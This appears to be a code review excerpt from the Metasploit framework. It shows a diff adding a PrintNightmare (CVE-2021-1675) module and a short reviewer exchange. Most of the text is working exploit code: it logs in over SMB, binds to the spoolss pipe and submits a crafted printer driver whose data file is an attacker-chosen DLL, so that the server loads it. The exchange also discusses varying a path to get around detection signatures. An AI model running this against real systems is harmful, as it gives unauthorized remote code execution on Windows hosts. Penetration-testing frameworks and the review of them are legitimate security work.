modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

```diff
@@ -0,0 +1,430 @@
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [
+            UNRELIABLE_SESSION # appears to fail after succeeding once until the server is restarted
+          ],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK # the dll will be copied to the remote server
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('DLL_PATH', [ true, 'The path to the DLL that the server should load' ])
+      ]
+    )
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to connect to the remote service.')
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::LoginError
+      fail_with(Failure::NoAccess, 'Failed to authenticate to the remote service.')
+    end
+
+    arch = dcerpc_getarch
+    print_status("Target environment: Windows v#{simple.client.os_version} (#{arch})")
+
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43
+    if arch == ARCH_X64
+      environment = 'Windows x64'
+    elsif arch == ARCH_X86
+      environment = 'Windows NT x86'
+    else
+      fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported')
+    end
+
+    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])
+    vprint_status("Binding to #{handle} ...")
+    begin
+      dcerpc_bind(handle)
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
+      fail_with(Failure::Unreachable, "The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description})")
+    end
+    vprint_status("Bound to #{handle} ...")
+
+    print_status('Enumerating the installed printer drivers...')
+    drivers = enum_printer_drivers(environment)
+    driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"
+    vprint_status("Using driver path: #{driver_path}")
+
+    config_directory = get_printer_driver_directory(environment)
+    vprint_status("Using directory: #{config_directory}")
+
+    filename = datastore['DLL_PATH'].rpartition('\\').last
+    container = PrintSystem::DriverContainer.new(
+      level: 2,
+      tag: 2,
+      driver_info: PrintSystem::DriverInfo2.new(
+        c_version: 3,
+        p_name_ref_id: 0x00020000,
+        p_environment_ref_id: 0x00020004,
+        p_driver_path_ref_id: 0x00020008,
+        p_data_file_ref_id: 0x0002000c,
+        p_config_file_ref_id: 0x00020010,
+        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
+        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",
+        p_environment: environment,
+        p_driver_path: driver_path,
+        p_data_file: datastore['DLL_PATH'],
+        p_config_file: 'C:\\Windows\\System32\\kernel32.dll'
```

Comment:
Do we have to use this file, or can we use other files under `System32`? Just checking if we can randomize this somewhat at all.

Reply:
It appears that it needs to be a file that exists on disk. We could probably use another DLL but given that it's supposed to be a config file and not an executable file, a signature that just checks for a suffix of DLL in system32 would be pretty trivial to write that would handle all of the cases.